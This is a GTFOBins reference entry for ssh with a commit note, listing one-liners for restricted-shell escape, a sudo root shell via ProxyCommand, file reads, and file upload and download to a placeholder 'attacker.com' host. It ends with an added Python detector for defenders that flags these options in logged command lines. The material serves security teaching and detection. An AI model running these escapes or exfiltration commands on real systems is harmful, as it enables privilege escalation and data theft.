GTFOBins.github.io/_gtfobins/ssh.md
James Spadaro cd05b58e70
Add LocalCommand option to SSH
SSH has a LocalCommand option that will run a given command on the client machine after a successful connection.  It is generally disabled, but can be enabled on the command line with "-oPermitLocalCommand=yes".  This is useful for bypassing restricted shells.

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-05-01 11:07:53 +02:00

1.1 KiB

| function | description | code |
| --- | --- | --- |
| shell | Reconnecting may help bypass restricted shells. | `ssh localhost $SHELL --noprofile --norc` |
| shell | Spawn interactive shell through ProxyCommand option. | `ssh -o ProxyCommand=';sh 0<&2 1>&2' x` |
| shell | Spawn interactive shell on client, requires a successful connection towards `host`. | `ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host` |
| file-upload | Send a local file to an SSH server. | `HOST=user@attacker.com RPATH=file_to_save LPATH=file_to_send ssh $HOST "cat > $RPATH" < $LPATH` |
| file-download | Fetch a remote file from an SSH server. | `HOST=user@attacker.com RPATH=file_to_get LPATH=file_to_save ssh $HOST "cat $RPATH" > $LPATH` |
| file-read | The content of the file read is corrupted by error messages. | `LFILE=file_to_read ssh -F $LFILE localhost` |
| sudo | Spawn interactive root shell through ProxyCommand option. | `sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x` |
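For defenders, the following added example (not part of the GTFOBins entry) checks logged `ssh` command lines for the options used above: `ProxyCommand`, `LocalCommand` with `PermitLocalCommand=yes`, and `-F` pointing at a caller-chosen file. The function name, finding labels and sample lines are constructed for illustration; it covers only `-o` and `-F`, not options set inside a config file.

```python
import os
import re
import shlex

def ssh_options(args):
    """Yield (flag, value) for -o and -F in '-o X' and '-oX' spellings."""
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in ("-o", "-F") and i + 1 < len(args):
            yield arg, args[i + 1]
            i += 2
        else:
            if arg[:2] in ("-o", "-F") and len(arg) > 2:
                yield arg[:2], arg[2:]
            i += 1

def audit_ssh(cmdline):
    """Return sorted finding labels for one logged ssh command line."""
    argv = shlex.split(cmdline)
    names = [os.path.basename(a) for a in argv]
    if "ssh" not in names:
        return []
    start = names.index("ssh")
    findings = set()
    for flag, value in ssh_options(argv[start + 1:]):
        if flag == "-F":
            findings.add("custom-config-file")
            continue
        # -o accepts both "Key=value" and "Key value".
        parts = re.split(r"\s*=\s*|\s+", value.strip(), maxsplit=1)
        key = parts[0].lower()
        val = parts[1].lower() if len(parts) > 1 else ""
        if key == "proxycommand" and val != "none":
            findings.add(key)
        elif key == "localcommand":
            findings.add(key)
        elif key == "permitlocalcommand" and val == "yes":
            findings.add(key)
    if findings and "sudo" in names[:start]:
        findings.add("runs-under-sudo")
    return sorted(findings)

if __name__ == "__main__":
    # Constructed process-audit command lines, not real log data.
    for line in ["ssh -p 2222 user@host.example",
                 "sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x"]:
        print(audit_ssh(line), line)
```

A rule like this fits process-execution telemetry (auditd `execve` records, EDR command-line fields) on hosts where users sit in restricted shells or hold a sudoers entry for `ssh`.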